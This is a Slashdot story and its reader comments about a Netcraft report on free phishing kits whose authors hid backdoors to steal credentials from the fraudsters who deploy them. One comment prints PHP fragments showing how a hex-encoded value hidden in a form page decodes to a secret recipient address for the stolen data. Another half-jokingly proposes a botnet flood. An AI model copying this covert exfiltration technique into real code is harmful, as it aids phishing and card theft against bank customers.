Slashdot Mirror

← Back to Stories (view on slashdot.org)

Phishing Group Caught Stealing From Other Phishers

Posted by samzenpus on from the what's-good-for-the-goose dept.

An anonymous reader writes "Netcraft has written about a website offering free phishing kits with one ironic twist — they all contain backdoors to steal stolen credentials from the fraudsters that deploy them. Deliberately deceptive code inside the kits means that script kiddies are unlikely to realize that any captured credit card numbers also end up getting sent to the people who made the phishing kits. The same group was also responsible for another backdoored phishing kit used against Bank of America earlier this month."

8 of 129 comments (clear)

  1. Mr-Brain's site by aerthling · · Score: 5, Informative

    Here's his site: http://thebadboys.org/Brain/

  2. Re:Nuke the phishers by FLEB · · Score: 4, Informative

    What is stopping a law enforcement agency from putting out a 'phishing' kit that actually phished the phishers?

    The law, mostly. It's just as illegal for someone to make "counter-malware" to break into a computer uninvited as it is for anyone else to make malicious software that breaks in.

    --
    Information wants to be free.
    Entertainment wants to be paid.
    You just want to be cheap.
  3. Re:I wish it were possible to zoom in... by Mr.+Roadkill · · Score: 5, Informative

    Naturally Netcraft won't tell you the real site name :-)
    Naturally. And who can blame them? I certainly don't - who knows what kind of nasties they might have lurking on those pages waiting for unsuspecting CEO's and CIO's and security experts who ought to know better?

    However, Google is your friend. Within 30 seconds of looking over the Netcraft article for helpfully unique strings, I found it. And went looking with lynx :-) I won't give the URL, to protect the stupid from themselves, but it's not that hard to find.

    They've got ready-rolled scams for abbey.co.uk, bankofamerica.com, cahoot.co.uk, chase.com, egold.com, ebay.com, hsbc,co.uk, lloydstsb.com, moneybookers.com, nationwide.co.uk, nbk.com.kw, paypal.com, regions.com, stgeorge.com.au, wachovia.com and westernunion.com - and in some cases, they have more than one for particular organisations.

    Cool. Now who has a spare botnet, is willing to wade through this arsehole's source, and is willing to send garbage values to al-brain@hotmail.fr and albrain08@yahoo.fr?
  4. Re:Just what is stopping law enforcement? by ShaunC · · Score: 4, Informative

    Don't you ever wonder why there have been so few significant arrests of spammers/phishers/etc?
    No, not really.

    For the most part, these have been made federal crimes, even to the extent of superseding existing state laws. A few years ago, several states had passed fairly strong anti-spam laws. If someone violated the law, you could file against them in your local small claims court, and secure a guaranteed judgement (good luck collecting, but that's another story) if they didn't show. Slashdot regular Bennett Haselton made boilerplate of that process, as I recall. Then along came CAN-SPAM, which created huge loopholes and essentially declared that individual state laws about spam, if less tolerant than the federal statute, were no longer enforceable.

    So now it's up to the feds to prosecute spammers, phishers, and other ill-willed malfeasants. Most of the time, the feds have better things to worry about, and unless you personally can prove tens of thousands in damages, they're unlikely to raise an eyebrow. You do remember how the FBI's last few technology initiatives turned out, right? The penultimate example being "Virtual Case File," a/k/a "Virtual Money Sink." What amounts to a data warehouse with a client app to query it, $200 million later and it's scrapped. Two hundred MILLION dollars down the drain on a failed initiative to, in essence, secure some data feeds, create some transformations, and develop a GUI to query the whole shebang. You really expect these guys to track down John Dodrescu in Romania who's spoofing a Bank of America website on some zombie PCs in Italy, oh wait, that was 10 minutes ago before the TTL on the DNS expired, now it's some zombie PCs in France?

    Give me, a non-gov IT professional, a team of 10 people of my choosing, fund me with one single million dollars and some travel vouchers, and agree to keep the project going for one year. A lot of these assholes will be out of business inside of 6 months, with many of their contemporaries scared shitless of becoming the next statistic. No fatalities, just a lot of people behind bars. But the federal government doesn't work that way because as many of us are well aware, it isn't profitable to run an IT department. They'd rather hire 1,000 guys who may or may not be able to tell you which of (XM|XP|XTC) is a version of Windows, at $50K a year apiece, then bitch and moan that they can't stop the problem with $50mil so they can justify a bigger budget next year.

    America is spending more money per day in Iraq than it would take to adequately investigate, build cases against, and convict all of the prolific spammers in the entire world.

    No, I don't often wonder why these problems haven't been solved. The federal government has been tasked with solving them, and that's all the why I need.
    --
    Thanks to the War on Drugs, it's easier to buy meth than it is to buy cold medicine!
  5. The real backdoor email address... by Anonymous Coward · · Score: 2, Informative

    It looks like you too have been misled by the code. The email addresses al-brain@hotmail.fr and albrain08@yahoo.fr are the ones that the 'script kiddies' are meant to change before using the phishing kit. The backdoor email address is actually encoded within the other scripts.

    Looking at the code more carefully you'll see..

    details.php includes this in the phishing page form:

    logon.php has these lines of code:
        $d="details.php";
        $erorr=file_get_contents($d);
        $IP=pack("H*", substr($VARS=$erorr,strpos($VARS, "102")+3,46));

    and Mr-Brain.php has this:
        $send="al-brain@hotmail.fr,albrain08@yahoo.fr";
        $str=array($send, $IP);
        foreach ($str as $send)
            mail($send,$subject,$message,$headers);

    Basically, it pulls the "niarB" value from the page, decodes it, and then it is included in the array of email addresses that the details get mailed to.

    The Brain's backdoor email address turns out to be: pioneer.brain@gmail.com

  6. Re:How times have changed: you can't trust.....wai by nacturation · · Score: 3, Informative

    I have to pay a little extra for eat (about US$ 3/month), but it is well worth it. It is considered (and marketed as) an insurance. I have this since 1996, and I'm happy to say I never needed. I have a solution as well: use your credit card so that there's no liability to you even if someone does use it fraudulently. And since 1996, you've spent about $400 on this insurance you didn't need. The only time I could see that as being useful is if someone robs you while you're in the process of making a withdrawal at an ATM.
    --
    Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
  7. Re:How times have changed: you can't trust.....wai by markov_chain · · Score: 2, Informative

    Citibank has this feature. They call it "Virtual Account Numbers."

    --
    Tsunami -- You can't bring a good wave down!
  8. Re:Just what is stopping law enforcement? by gujo-odori · · Score: 2, Informative

    Speaking as someone in the security industry and very closely involved with anti-phishing efforts, I have to say that the million dollars and the team of 10 wouldn't do you much good, because the phishers are not only not in the United States or Canada, where they would be relatively easy to apprehend, but are almost all in Russia, Romania, and other eastern European countries where even catching them, let alone getting them prosecuted is a much more difficult proposition. Extradition? Forget it.

    The only way a team like that might be effective is if it were a hit squad, but even then, there are just too many phishers to assassinate.

    LE has a lot more than 10 people working on this and spends far more than a million dollars a year on it, and look how hard it is to get arrests, prosecutions, and convictions (there have been some, but they are hard to get), what makes you think you could do better with only 10 people, a million bucks, and no stated LE experience, and meet all the evidentiary requirements to get a prosecution and a conviction? You'll pardon me if I take your claim with quite a few grains of salt.

    I've personally met FBI special agents who work on this area. Believe me, they know far more about this than you do, and have resources your hypothetical million dollars couldn't get you. Heck, that million bucks would just cover the salary and benefits of that team of ten (assuming they work cheap; it wouldn't cover salary and benefits for 10 people who make what I make), without even getting into any external costs of forensic lab services, equipment purchases, etc. And even if you did do better research work than the FBI, good luck convincing an eastern European police agency to follow it up after you email them about it.